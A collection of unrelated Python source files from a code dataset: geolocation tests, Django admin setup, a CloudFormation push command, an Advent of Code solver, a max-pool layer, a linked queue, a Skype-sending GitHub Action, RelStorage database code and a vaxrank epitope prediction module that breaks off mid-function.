self.assertAlmostEqual(center[0], 38.7095)
self.assertAlmostEqual(center[1], -93.6112)
center = get_center_geo_locs(geo_locs, mode="mean")
self.assertAlmostEqual(center[0], 39.847162352941176)
self.assertAlmostEqual(center[1], -87.36079411764706)
center = get_center_ip_entities(ip_entities)
self.assertAlmostEqual(center[0], 38.7095)
self.assertAlmostEqual(center[1], -93.6112)
hosts = []
for ip in ip_entities:
new_host = Host(HostName=ip.Address)
new_host.ip = ip
hosts.append(new_host)
center = get_map_center(entities=hosts)
self.assertAlmostEqual(center[0], 39.847162352941176)
self.assertAlmostEqual(center[1], -87.36079411764706)
@pytest.mark.skipif(
not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
)
def test_folium_map_notebook(self):
nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
abs_path = Path(_NB_FOLDER).absolute()
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
try:
ep.preprocess(nb, {"metadata": {"path": abs_path}})
except CellExecutionError:
nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
msg = f"Error executing the notebook '{nb_path}'.\n"
msg += f"See notebook '{nb_err}' for the traceback."
print(msg)
with open(nb_err, mode="w", encoding="utf-8") as f:
nbformat.write(nb, f)
raise
def create_ip_entity(row):
ip_ent = IpAddress(Address=row["AllExtIPs"])
geo_loc = create_geo_entity(row)
ip_ent.Location = geo_loc
return ip_ent
def create_geo_entity(row):
# get subset of fields for GeoLocation
loc_props = row[
["CountryCode", "CountryName", "State", "City", "Longitude", "Latitude"]
]
geo_loc = GeoLocation(**loc_props.to_dict())
return geo_loc
|
StarcoderdataPython
|
3277388
|
from django.contrib import admin
from .models import Brouwersdag, Competition, Exhibitor, ShowCasedModel
@admin.register(ShowCasedModel)
class ShowCasedModelAdmin(admin.ModelAdmin):
list_display = (
"name",
"owner",
"scale",
"length",
"width",
"height",
"is_competitor",
"id",
)
list_filter = ("competition", "is_competitor", "is_paid", "brouwersdag", "scale")
search_fields = ("competition__name", "name", "owner__username")
@admin.register(Competition)
class CompetitionAdmin(admin.ModelAdmin):
list_display = (
"__str__",
"name",
"max_num_models",
"max_participants",
"is_current",
)
list_editable = ("name", "max_num_models", "max_participants", "is_current")
search_fields = ("name",)
class ExhibitorInline(admin.TabularInline):
model = Exhibitor
@admin.register(Brouwersdag)
class BrouwersdagAdmin(admin.ModelAdmin):
list_display = ("name", "date")
list_editable = ("date",)
search_fields = ("name",)
inlines = [ExhibitorInline]
|
StarcoderdataPython
|
3291873
|
"""
Push local state to AWS Cloudformation
"""
import collections
import sys
import click
import halo
from ..aws.cloudformation import Cloudformation
from ..exceptions import StackNotFound
from ..utils import (accounts_regions_and_names, class_filter, plural,
set_stacks)
@click.command()
@accounts_regions_and_names
@click.option('--force', is_flag=True)
@click.option('--use-existing-params', is_flag=True)
@click.option('--skip-tags', is_flag=True)
def push(ctx, accounts, regions, names, force, use_existing_params, skip_tags):
"""
Create/Update live stacks
"""
set_stacks(ctx)
count, found_stacks = class_filter(ctx.obj.stacks,
account=accounts,
region=regions,
name=names)
click.echo(f'Found {plural(count, "local stack")}')
describe_stacks = collections.defaultdict(dict)
to_change = []
for stack in found_stacks:
ctx.obj.debug(
f'Found {stack.name} in region {stack.region} with account number {stack.account_id}'
)
# If we have a small number of stacks, it's faster to just create changesets
        if (len(found_stacks) < 20 or names or force or stack.purge):
if stack.purge:
ctx.obj.debug(f'Checking to see if {stack.name} still exists')
if not stack.exists:
continue
to_change.append(stack)
# Use describe stacks and compare STAX_HASH tag
else:
key = f'{stack.account},{stack.region}'
if key not in describe_stacks:
cf = Cloudformation(account=stack.account, region=stack.region)
with halo.Halo('Fetching stack status'):
describe_stacks[key] = cf.describe_stacks()
try:
stax_hash = [
tag['Value']
for tag in describe_stacks[key][stack.name]['Tags']
if tag['Key'] == 'STAX_HASH'
][0]
except (KeyError, IndexError):
stax_hash = None
if stack.pending_update(stax_hash):
to_change.append(stack)
if not found_stacks:
click.echo('No stacks found to update')
sys.exit(1)
print('{} to update... {}\n'.format(
plural(len(to_change), 'stack'),
[stack.name for stack in to_change] if to_change else ''))
# Update should be more common than create, so let's assume that and save time
for stack in to_change:
if stack.purge is False:
try:
stack.update(use_existing_params=use_existing_params,
skip_tags=skip_tags)
except StackNotFound:
stack.create()
else:
ctx.obj.debug(f'No change required for {stack.name}')
else:
if stack.exists:
stack.delete()
|
StarcoderdataPython
|
1649345
|
# -*- coding: utf-8 -*-
import argparse
import pdb
import traceback
from hashlib import md5
from typing import List, Tuple
def solve(door_id: str, verbose=False) -> Tuple[str, str]:
pword_one: List[str] = []
pword_two: List[str] = [None] * 8 # type: ignore
chars_left: int = 8
index: int = 0
while True:
digest = md5(bytearray(door_id + str(index), "utf-8")).hexdigest()
if digest.startswith("00000"):
if len(pword_one) < 8:
ch: str = digest[5]
pword_one.append(ch)
if verbose:
print(f"one: {index} {ch} {pword_one}")
if chars_left:
pos: str = digest[5]
ch = digest[6]
if pos >= "0" and pos <= "7":
position = ord(pos) - ord("0")
if not pword_two[position]:
pword_two[position] = ch
chars_left -= 1
if verbose:
print(f"two: {index} {pos} '{ch}' {pword_two}")
if len(pword_one) == 8 and not chars_left:
break
index += 1
one: str = "".join(pword_one)
two: str = "".join(pword_two)
return (one, two)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Advent of Code - 2016 - Day 5 - How About a Nice Game of Chess?"
)
parser.add_argument(
"door_id",
type=str,
default="ffykfhsq",
nargs="?",
help="The puzzle input. (Default %(default)s)",
)
parser.add_argument(
"--verbose",
action="store_true",
default=False,
help="Display extra info. (Default: %(default)s)",
)
args = parser.parse_args()
try:
print(solve(args.door_id, verbose=args.verbose))
except Exception:
traceback.print_exc()
pdb.post_mortem()
|
StarcoderdataPython
|
4843213
|
import numpy as np
class MaxPool:
    def __init__(self):
        # Per-instance bookkeeping for the shape of the most recent input.
        self.image_shape = [0, 0]
        self.num_filters = 0
def forward(self, input_image):
"""
function for performing forward propagation
Parameters:
input_image : numpy array
Returns:
output : numpy array
"""
self.last_input = input_image
self.image_shape[0], self.image_shape[1], self.num_filters = input_image.shape
output = np.zeros(((self.image_shape[0]//2), (self.image_shape[1]//2), self.num_filters))
for i in range((self.image_shape[0] // 2)):
for j in range((self.image_shape[1] // 2)):
selected_region = input_image[(i*2):(i*2+2),(j*2):(j*2+2)]
output[i, j] = np.amax(selected_region, axis=(0, 1))
return output
def backprop(self, error):
"""
function for performing backward propagation
Parameters:
error : numpy array
Returns:
conv_error : numpy array
"""
conv_error = np.zeros(self.last_input.shape)
for i in range(self.last_input.shape[0]//2):
for j in range(self.last_input.shape[1]//2):
selected_region = self.last_input[(i * 2):(i * 2 + 2), (j * 2):(j * 2 + 2)]
h, w, f = selected_region.shape
amax = np.amax(selected_region, axis=(0, 1))
for i2 in range(h):
for j2 in range(w):
for f2 in range(f):
# If this pixel was the max value, copy the gradient to it.
if selected_region[i2, j2, f2] == amax[f2]:
conv_error[i * 2 + i2, j * 2 + j2, f2] = error[i, j, f2]
return conv_error
# def get_output_shape(self):
# return np.zeros(((self.image_shape[0]//2), (self.image_shape[1]//2), self.num_filters)).shape
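# Hypothetical usage sketch (not part of the original module): pushes a random
# 4x4 single-channel "image" through the layer and propagates a dummy gradient.
if __name__ == "__main__":
    pool = MaxPool()
    image = np.random.rand(4, 4, 1)
    pooled = pool.forward(image)                     # shape (2, 2, 1)
    upstream = pool.backprop(np.ones_like(pooled))   # shape (4, 4, 1)
    print(pooled.shape, upstream.shape)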
|
StarcoderdataPython
|
3328117
|
<reponame>ywkpl/DataStructuresAndAlgorithms<filename>Queue/LinkedQuequ.py
from typing import TypeVar, Generic
T=TypeVar('T')
class Node(Generic[T]):
def __init__(self, data:T, next=None):
self.data=data
self._next=next
class LinkedQueue(Generic[T]):
def __init__(self, capacity:int):
self._capacity=capacity
self._head=None
self._len=0
def enqueue(self, value:T):
if not value:
return
node=Node[T](value)
self.enqueue_node(node)
def enqueue_node(self, node:Node[T]):
        # queue is full
        if self.is_full():
            print('Queue is full!')
return
if not self._head:
self._head=node
self._len+=1
return
node._next=self._head
self._head=node
self._len+=1
def is_empty(self)->bool:
return self._len==0
def is_full(self)->bool:
return self._len==self._capacity
def dequeue(self):
if self.is_empty():
return
if not self._head._next:
self._head=None
self._len-=1
return
prev=self._head
while prev._next._next:
prev=prev._next
prev._next=None
self._len-=1
def len(self):
return self._len
def print_all(self):
if not self._head:
return
cur=self._head
while cur:
print(cur.data)
cur=cur._next
def test_LinkedQueue():
    print('Initializing an integer queue with capacity 5')
queue=LinkedQueue[int](5)
assert queue.is_empty()
queue.enqueue(2)
queue.enqueue(3)
queue.enqueue(5)
queue.enqueue(88)
queue.enqueue(9)
assert queue.is_full()
queue.print_all()
    print('Full-queue test')
queue.dequeue()
queue.dequeue()
queue.dequeue()
    print('After dequeuing three times:')
queue.print_all()
    print('Enqueue one more item:')
queue.enqueue(456)
queue.print_all()
queue.dequeue()
queue.dequeue()
queue.dequeue()
    print('Empty-queue test')
queue.dequeue()
queue.print_all()
if __name__=="__main__":
test_LinkedQueue()
|
StarcoderdataPython
|
3233214
|
<reponame>Eloco/docker-action-send-skype
#!/usr/bin/env python
# coding=utf-8
import os
import emoji
from skpy import Skype, SkypeChats
import skpy
import time
import sys
import re
"""
Eloco
"""
def connect_skype(user=str, pwd=str):
print(f"""[init]Skype connecting <{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}>""")
sk=Skype(user,pwd)
print(f"""[init]Skype connected! <{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}>""")
return sk
def walk_file(file_dir):
L=[]
for root, dirs, files in os.walk(file_dir):
for file in files:
L.append(os.path.join(root, file))
return L
def skype_activate_send():
"""
[init] env
"""
sk =connect_skype(user=os.environ.get('INPUT_SKYPE_USERNAME'),pwd=os.environ.get('INPUT_SKYPE_PASSWORD'))
skype_ids =os.environ.get('INPUT_SKYPE_IDS')
send_msg_path =os.environ.get('GITHUB_WORKSPACE')+"/"+os.environ.get('INPUT_SEND_MSG_PATH')
send_file_path =os.environ.get('GITHUB_WORKSPACE')+"/"+os.environ.get('INPUT_SEND_FILE_PATH')
"""
[update] send something to id on skype
"""
def send_msg(ch,file_path):
message=open(file_path, "r").read()
ch.sendMsg(emoji.emojize(message,use_aliases=True)) # emoji support!
def send_file(ch,file_path):
file_name=os.path.basename(file_path)
is_image=True if re.match( r'.*\.(jpg|bmp|gif|ico|pcx|jpeg|tif|png|raw|tga)$', file_name, re.M|re.I) else False
ch.sendFile(open(file_path, "rb"), file_name,image=is_image)
def walk_and_run(send_func,file_path=str,ch=None):
if os.path.isdir(file_path):
for f in walk_file(file_path):
send_func(ch=ch,file_path=f)
elif os.path.isfile(file_path):
send_func(ch=ch,file_path=file_path)
for skype_id in skype_ids.strip().split():
ch = sk.chats[skype_id] if "@thread.skype" in skype_id else sk.contacts[skype_id].chat #sent to group chat or contact by id
walk_and_run(send_func=send_msg ,file_path=send_msg_path ,ch=ch)
walk_and_run(send_func=send_file,file_path=send_file_path,ch=ch)
if __name__ == '__main__':
skype_activate_send()
|
StarcoderdataPython
|
118641
|
<gh_stars>1-10
##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""IObjectMover implementation.
"""
from __future__ import absolute_import
from perfmetrics import Metric
from relstorage.adapters.batch import RowBatcher
from relstorage.adapters.interfaces import IObjectMover
from relstorage.adapters._util import query_property as _query_property
from relstorage.adapters._util import noop_when_history_free
from relstorage.iter import fetchmany
from zope.interface import implementer
from hashlib import md5
from relstorage._compat import db_binary_to_bytes
metricmethod_sampled = Metric(method=True, rate=0.1)
@implementer(IObjectMover)
class AbstractObjectMover(object):
def __init__(self, database_type, options, runner=None,
Binary=None, version_detector=None,
batcher_factory=RowBatcher):
self.database_type = database_type
self.keep_history = options.keep_history
self.blob_chunk_size = options.blob_chunk_size
self.runner = runner
self.Binary = Binary
self.version_detector = version_detector
self.make_batcher = batcher_factory
@noop_when_history_free
def _compute_md5sum(self, data):
if data is None:
return None
return md5(data).hexdigest()
_load_current_queries = (
"""
SELECT state, tid
FROM current_object
JOIN object_state USING(zoid, tid)
WHERE zoid = %s
""",
"""
SELECT state, tid
FROM object_state
WHERE zoid = %s
""")
_load_current_query = _query_property('_load_current')
@metricmethod_sampled
def load_current(self, cursor, oid):
"""Returns the current pickle and integer tid for an object.
oid is an integer. Returns (None, None) if object does not exist.
"""
stmt = self._load_current_query
cursor.execute(stmt, (oid,))
# Note that we cannot rely on cursor.rowcount being
# a valid indicator. The DB-API doesn't require it, and
# some implementations, like MySQL Connector/Python are
# unbuffered by default and can't provide it.
row = cursor.fetchone()
if row:
state, tid = row
state = db_binary_to_bytes(state)
# If it's None, the object's creation has been
# undone.
return state, tid
return None, None
_load_revision_query = """
SELECT state
FROM object_state
WHERE zoid = %s
AND tid = %s
"""
@metricmethod_sampled
def load_revision(self, cursor, oid, tid):
"""Returns the pickle for an object on a particular transaction.
Returns None if no such state exists.
"""
stmt = self._load_revision_query
cursor.execute(stmt, (oid, tid))
row = cursor.fetchone()
if row:
(state,) = row
return db_binary_to_bytes(state)
return None
_exists_queries = (
"SELECT 1 FROM current_object WHERE zoid = %s",
"SELECT 1 FROM object_state WHERE zoid = %s"
)
_exists_query = _query_property('_exists')
@metricmethod_sampled
def exists(self, cursor, oid):
"""Returns a true value if the given object exists."""
stmt = self._exists_query
cursor.execute(stmt, (oid,))
row = cursor.fetchone()
return row
@metricmethod_sampled
def load_before(self, cursor, oid, tid):
"""Returns the pickle and tid of an object before transaction tid.
Returns (None, None) if no earlier state exists.
"""
stmt = """
SELECT state, tid
FROM object_state
WHERE zoid = %s
AND tid < %s
ORDER BY tid DESC
LIMIT 1
"""
cursor.execute(stmt, (oid, tid))
row = cursor.fetchone()
if row:
state, tid = row
state = db_binary_to_bytes(state)
# None in state means The object's creation has been undone
return state, tid
return None, None
@metricmethod_sampled
def get_object_tid_after(self, cursor, oid, tid):
"""Returns the tid of the next change after an object revision.
Returns None if no later state exists.
"""
stmt = """
SELECT tid
FROM object_state
WHERE zoid = %s
AND tid > %s
ORDER BY tid
LIMIT 1
"""
cursor.execute(stmt, (oid, tid))
row = cursor.fetchone()
if row:
return row[0]
# NOTE: These are not database param escapes, they are Python
# escapes, so they shouldn't be translated to :1, etc.
_current_object_tids_queries = (
"SELECT zoid, tid FROM current_object WHERE zoid IN (%s)",
"SELECT zoid, tid FROM object_state WHERE zoid IN (%s)"
)
_current_object_tids_query = _query_property('_current_object_tids')
@metricmethod_sampled
def current_object_tids(self, cursor, oids):
"""Returns the current {oid: tid} for specified object ids."""
res = {}
_stmt = self._current_object_tids_query
oids = list(oids)
while oids:
# XXX: Dangerous (SQL injection)! And probably slow. Can we do better?
oid_list = ','.join(str(oid) for oid in oids[:1000])
del oids[:1000]
stmt = _stmt % (oid_list,)
cursor.execute(stmt)
for oid, tid in fetchmany(cursor):
res[oid] = tid
return res
#: A sequence of *names* of attributes on this object that are statements to be
#: executed by ``on_store_opened`` when ``restart`` is False.
on_store_opened_statement_names = ()
def on_store_opened(self, cursor, restart=False):
if not restart:
for stmt_name in self.on_store_opened_statement_names:
cursor.execute(getattr(self, stmt_name))
#: A sequence of *names* of attributes on this object that are statements to be
#: executed by ``on_store_opened`` when ``restart`` is False.
on_load_opened_statement_names = ()
def on_load_opened(self, cursor, restart=False):
if not restart:
for stmt_name in self.on_load_opened_statement_names:
cursor.execute(getattr(self, stmt_name))
def _generic_store_temp(self, batcher, oid, prev_tid, data,
command='INSERT', suffix=''):
md5sum = self._compute_md5sum(data)
if command == 'INSERT' and not suffix:
# MySQL uses command=REPLACE for an UPSERT
# PostgreSQL 9.5+ uses a suffix='ON CONFLICT UPDATE...' for an UPSERT
batcher.delete_from('temp_store', zoid=oid)
batcher.insert_into(
"temp_store (zoid, prev_tid, md5, state)",
"%s, %s, %s, %s",
(oid, prev_tid, md5sum, self.Binary(data)),
rowkey=oid,
size=len(data),
command=command,
suffix=suffix
)
def store_temp(self, cursor, batcher, oid, prev_tid, data):
raise NotImplementedError()
@metricmethod_sampled
def _generic_restore(self, batcher, oid, tid, data, command='INSERT'):
"""Store an object directly, without conflict detection.
Used for copying transactions into this database.
"""
md5sum = self._compute_md5sum(data)
if data is not None:
encoded = self.Binary(data)
size = len(data)
else:
encoded = None
size = 0
if self.keep_history:
if command == 'INSERT':
batcher.delete_from("object_state", zoid=oid, tid=tid)
row_schema = """
%s, %s,
COALESCE((SELECT tid FROM current_object WHERE zoid = %s), 0),
%s, %s, %s
"""
batcher.insert_into(
"object_state (zoid, tid, prev_tid, md5, state_size, state)",
row_schema,
(oid, tid, oid, md5sum, size, encoded),
rowkey=(oid, tid),
size=size,
command=command,
)
else:
if data:
if command == 'INSERT':
batcher.delete_from('object_state', zoid=oid)
batcher.insert_into(
"object_state (zoid, tid, state_size, state)",
"%s, %s, %s, %s",
(oid, tid, size, encoded),
rowkey=oid,
size=size,
command=command,
)
else:
batcher.delete_from('object_state', zoid=oid)
def restore(self, cursor, batcher, oid, tid, data):
raise NotImplementedError()
# careful with USING clause in a join: Oracle doesn't allow such
# columns to have a prefix.
_detect_conflict_queries = (
"""
SELECT zoid, current_object.tid, temp_store.prev_tid
FROM temp_store
JOIN current_object USING (zoid)
WHERE temp_store.prev_tid != current_object.tid
""",
"""
SELECT zoid, object_state.tid, temp_store.prev_tid
FROM temp_store
JOIN object_state USING (zoid)
WHERE temp_store.prev_tid != object_state.tid
"""
)
_detect_conflict_query = _query_property('_detect_conflict')
@metricmethod_sampled
def detect_conflict(self, cursor):
"""Find all conflicts in the data about to be committed.
If there is a conflict, returns a sequence of (oid, prev_tid, attempted_prev_tid).
"""
stmt = self._detect_conflict_query
cursor.execute(stmt)
rows = cursor.fetchall()
return rows
@metricmethod_sampled
def replace_temp(self, cursor, oid, prev_tid, data):
"""Replace an object in the temporary table.
This happens after conflict resolution.
"""
md5sum = self._compute_md5sum(data)
stmt = """
UPDATE temp_store SET
prev_tid = %s,
md5 = %s,
state = %s
WHERE zoid = %s
"""
cursor.execute(stmt, (prev_tid, md5sum, self.Binary(data), oid))
# Subclasses may override any of these queries if there is a
# more optimal form.
_move_from_temp_hp_insert_query = """
INSERT INTO object_state
(zoid, tid, prev_tid, md5, state_size, state)
SELECT zoid, %s, prev_tid, md5,
COALESCE(LENGTH(state), 0), state
FROM temp_store
"""
_move_from_temp_hf_insert_query = """
INSERT INTO object_state (zoid, tid, state_size, state)
SELECT zoid, %s, COALESCE(LENGTH(state), 0), state
FROM temp_store
"""
_move_from_temp_copy_blob_query = """
INSERT INTO blob_chunk (zoid, tid, chunk_num, chunk)
SELECT zoid, %s, chunk_num, chunk
FROM temp_blob_chunk
"""
_move_from_temp_hf_delete_blob_chunk_query = """
DELETE FROM blob_chunk
WHERE zoid IN (SELECT zoid FROM temp_store)
"""
def _move_from_temp_object_state(self, cursor, tid):
"""
Called for history-free databases.
Should replace all entries in object_state with the
same zoid from temp_store.
"""
stmt = """
DELETE FROM object_state
WHERE zoid IN (SELECT zoid FROM temp_store)
"""
cursor.execute(stmt)
stmt = self._move_from_temp_hf_insert_query
cursor.execute(stmt, (tid,))
@metricmethod_sampled
def move_from_temp(self, cursor, tid, txn_has_blobs):
"""Moved the temporarily stored objects to permanent storage.
Returns the list of oids stored.
"""
if self.keep_history:
stmt = self._move_from_temp_hp_insert_query
cursor.execute(stmt, (tid,))
else:
self._move_from_temp_object_state(cursor, tid)
if txn_has_blobs:
cursor.execute(self._move_from_temp_hf_delete_blob_chunk_query)
if txn_has_blobs:
stmt = self._move_from_temp_copy_blob_query
cursor.execute(stmt, (tid,))
stmt = """
SELECT zoid FROM temp_store
"""
cursor.execute(stmt)
return [oid for (oid,) in fetchmany(cursor)]
_update_current_insert_query = """
INSERT INTO current_object (zoid, tid)
SELECT zoid, tid FROM object_state
WHERE tid = %s
AND prev_tid = 0"""
_update_current_update_query = """
UPDATE current_object SET tid = %s
WHERE zoid IN (
SELECT zoid FROM object_state
WHERE tid = %s
AND prev_tid != 0
ORDER BY zoid)
"""
@noop_when_history_free
@metricmethod_sampled
def update_current(self, cursor, tid):
"""
Update the current object pointers.
tid is the integer tid of the transaction being committed.
"""
stmt = self._update_current_insert_query
cursor.execute(stmt, (tid,))
# Change existing objects. To avoid deadlocks,
# update in OID order.
stmt = self._update_current_update_query
cursor.execute(stmt, (tid, tid))
@metricmethod_sampled
def download_blob(self, cursor, oid, tid, filename):
"""Download a blob into a file."""
raise NotImplementedError()
def upload_blob(self, cursor, oid, tid, filename):
"""Upload a blob from a file.
If serial is None, upload to the temporary table.
"""
raise NotImplementedError()
|
StarcoderdataPython
|
176439
|
from __future__ import annotations
from exo import proc, Procedure, DRAM, config, instr, QAST
from matmap.base import *
from matmap.qast_utils.loopReader import *
class ReorderingTransform(Transform):
#loop bounds are a ForLoop object
#tile_bounds is a dict mapping names from the ForLoop to numbers
def __init__(self, loop_order):
self.loop_order = loop_order
def apply(self, fn, backend="exo"):
def get_loop_order(obj):
loops = readLoopNest(obj)[0]
loop_list = []
for loop in loops:
loop_list.append(loop.name)
return loop_list
loop_dict = {}
to_list = []
num = 0
for i in self.loop_order:
loop_dict[num] = i
to_list.append(num)
num += 1
given_list = []
new_dict = {value : key for (key, value) in loop_dict.items()}
for i in get_loop_order(fn):
given_list.append(new_dict[i])
#sort values and swap elements
n = len(given_list)
for i in range(n):
for j in range(n - 1):
if given_list[j] > given_list[j+1]:
fn = fn.reorder(loop_dict[given_list[j]], loop_dict[given_list[j+1]])
given_list[j], given_list[j+1] = given_list[j+1], given_list[j]
return fn
|
StarcoderdataPython
|
69274
|
# Application for working with dictionaries
# dictionaries: building, indexing, adding and removing keys, iterating through dictionaries
# as well as their keys and values, checking key existence, keys(), items() and values() methods
sample = {'home': '123 Main street', 'office': '22 Baker Street', 'bill': '1 Financial Way'}
print(sample)
print(sample.keys())
print(sample.values())
print("\nAccess Item.\n")
print(sample['home'])
print(sample.get('home'))
print(sample.get('red'))
for key in sample.keys():
print(key + " address is " + sample.get(key))
sample['home'] = "4321 lonesome range"
print(sample)
sample['vacation'] = "1 Sunshine Avenue"
print(sample)
print("\nFrom Blank\n")
blank = {}
blank["A"] = "Apple"
print(blank)
blank["B"] = "Banana"
print(blank)
print("\nDictionary items\n")
print(sample.items())
print("\nDictionary pop\n")
print(sample.pop('vacation'))
print(sample)
sample2 = sample.copy()
for item in sample.items():
print("Next pair is " + str(item))
print("\nDictionary popitem\n")
print(sample.popitem())
print(sample)
print(sample.popitem())
print(sample)
sample.clear()
print(sample)
print(sample2)
if sample2['home']:
print("That key exists")
if sample2.get('blue'):
print("That key exists")
else:
print("That key does not exist")
print(len(sample2))
print("\nApplication Ended.\n")
|
StarcoderdataPython
|
3389848
|
<reponame>shah-newaz/vaxrank<gh_stars>0
# Copyright (c) 2016-2018. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function, division
from collections import namedtuple, OrderedDict
import traceback
import logging
import numpy as np
from .reference_proteome import ReferenceProteome
logger = logging.getLogger(__name__)
EpitopePredictionBase = namedtuple("EpitopePrediction", [
"allele",
"peptide_sequence",
"wt_peptide_sequence",
"length",
"ic50",
"el_score",
"wt_ic50",
"wt_el",
"percentile_rank",
"prediction_method_name",
"overlaps_mutation",
"source_sequence",
"offset",
"occurs_in_reference",
])
class EpitopePrediction(EpitopePredictionBase):
def logistic_epitope_score(
self,
midpoint=350.0,
width=150.0,
el_score_cut_off=10.0): # TODO: add these default values into CLI as arguments
"""
Map from IC50 values to score where 1.0 = strong binder, 0.0 = weak binder
Default midpoint and width for logistic determined by max likelihood fit
for data from <NAME>'s 1994 paper:
"The relationship between class I binding affinity
        and immunogenicity of potential cytotoxic T cell epitopes."
TODO: Use a large dataset to find MHC binding range predicted to #
correlate with immunogenicity
"""
if self.percentile_rank >= el_score_cut_off:
return 0.0
return self.el_score
def predict_epitopes(
mhc_predictor,
protein_fragment,
min_epitope_score=0.0,
genome=None):
"""
Parameters
----------
mhc_predictor : mhctools.BasePredictor
Object with predict_peptides method
protein_fragment : MutantProteinFragment
peptide_length : list of int
Lengths of peptides to make pMHC binding predictions for
min_epitope_score : float
Ignore peptides with binding predictions whose normalized score is less
than this.
genome : pyensembl.Genome
Genome whose proteome to use for reference peptide filtering
Returns an OrderedDict of EpitopePrediction objects, keyed by a
(peptide sequence, allele) tuple, that have a normalized score greater
than min_epitope_score.
Uses the input genome to evaluate whether the epitope occurs in reference.
"""
results = OrderedDict()
reference_proteome = ReferenceProteome(genome)
# sometimes the predictors will fail, and we don't want to crash vaxrank in that situation
# TODO: make more specific or remove when we fix error handling in mhctools
try:
mhctools_binding_predictions = mhc_predictor.predict_subsequences(
{protein_fragment.gene_name: protein_fragment.amino_acids})
except:
logger.error(
'MHC prediction errored for protein fragment %s, with traceback: %s',
protein_fragment, traceback.format_exc())
return results
# compute the WT epitopes for each mutant fragment's epitopes; mutant -> WT
wt_peptides = {}
for binding_prediction in mhctools_binding_predictions:
peptide = binding_prediction.peptide
peptide_length = binding_prediction.length
peptide_start_offset = binding_prediction.offset
peptide_end_offset = peptide_start_offset + peptide_length
overlaps_mutation = protein_fragment.interval_overlaps_mutation(
start_offset=peptide_start_offset,
end_offset=peptide_end_offset)
if overlaps_mutation:
full_reference_protein_sequence = (
protein_fragment.predicted_effect().original_protein_sequence
)
global_epitope_start_pos = (
protein_fragment.global_start_pos() + peptide_start_offset
)
wt_peptide = full_reference_protein_sequence[
global_epitope_start_pos:global_epitope_start_pos + peptide_length]
wt_peptides[peptide] = wt_peptide
wt_predictions = []
try:
# filter to minimum peptide lengths
valid_wt_peptides = [
x for x in wt_peptides.values() if len(x) >= mhc_predictor.min_peptide_length
]
if len(valid_wt_peptides) > 0:
wt_predictions = mhc_predictor.predict_peptides(valid_wt_peptides)
except:
logger.error(
'MHC prediction for WT peptides errored, with traceback: %s',
traceback.format_exc())
wt_predictions_grouped = {}
# break it out: (peptide, allele) -> prediction
for wt_prediction in wt_predictions:
wt_predictions_grouped[(wt_prediction.peptide, wt_prediction.allele)] = wt_prediction
# convert from mhctools.BindingPrediction objects to EpitopePrediction
# which differs primarily by also having a boolean field
# 'overlaps_mutation' that indicates whether the epitope overlaps
# mutant amino acids or both sides of a deletion
num_total = 0
num_occurs_in_reference = 0
num_low_scoring = 0
for binding_prediction in mhctools_binding_predictions:
num_total += 1
peptide = binding_prediction.peptide
peptide_length = binding_prediction.length
peptide_start_offset = binding_prediction.offset
peptide_end_offset = peptide_start_offset + peptide_length
overlaps_mutation = protein_fragment.interval_overlaps_mutation(
start_offset=peptide_start_offset,
end_offset=peptide_end_offset)
occurs_in_reference = reference_proteome.contains(peptide)
if occurs_in_reference:
logger.debug('Peptide %s occurs in reference', peptide)
num_occurs_in_reference += 1
# compute WT epitope sequence, if this epitope overlaps the mutation
if overlaps_mutation:
wt_peptide = wt_peptides[peptide]
wt_prediction = wt_predictions_grouped.get((wt_peptide, binding_prediction.allele))
wt_ic50 = None
wt_el = None
if wt_prediction is None:
# this can happen in a stop-loss variant: do we want to check that here?
if len(wt_peptide) < mhc_predictor.min_peptide_length:
logger.info(
'No prediction for too-short WT epitope %s: possible stop-loss variant',
wt_peptide)
else:
wt_ic50 = wt_prediction.value
wt_el = wt_prediction.percentile_rank
else:
wt_peptide = peptide
wt_ic50 = binding_prediction.value
wt_el = binding_prediction.percentile_rank
epitope_prediction = EpitopePrediction(
allele=binding_prediction.allele,
peptide_sequence=peptide,
wt_peptide_sequence=wt_peptide,
length=len(peptide),
ic50=binding_prediction.value,
el_score=binding_prediction.score,
wt_ic50=wt_ic50,
wt_el=wt_el,
percentile_rank=binding_prediction.percentile_rank,
prediction_method_name=binding_prediction.prediction_method_name,
overlaps_mutation=overlaps_mutation,
source_sequence=protein_fragment.amino_acids,
offset=peptide_start_offset,
occurs_in_reference=occurs_in_reference)
if epitope_prediction.logistic_epitope_score() >= min_epitope_score:
key = (epitope_prediction.peptide_sequence, epitope_prediction.allele)
results[key] = epitope_prediction
else:
num_low_scoring += 1
logger.info(
"%d total peptides: %d occur in reference, %d failed score threshold",
num_total,
num_occurs_in_reference,
num_low_scoring)
return results
def slice_epitope_predictions(
epitope_predictions,
start_offset,
end_offset):
"""
Return subset of EpitopePrediction objects which overlap the given interval
and slice through their source sequences and adjust their offset.
"""
return [
EpitopePrediction(
allele=p.allele,
peptide_sequence=p.peptide_sequence,
wt_peptide_sequence=p.wt_peptide_sequence,
length=p.length,
ic50=p.ic50,
el_score=p.el_score,
wt_ic50=p.wt_ic50,
wt_el=p.wt_el,
percentile_rank=p.percentile_rank,
prediction_method_name=p.prediction_method_name,
overlaps_mutation=p.overlaps_mutation,
source_sequence=p.source_sequence[start_offset:end_offset],
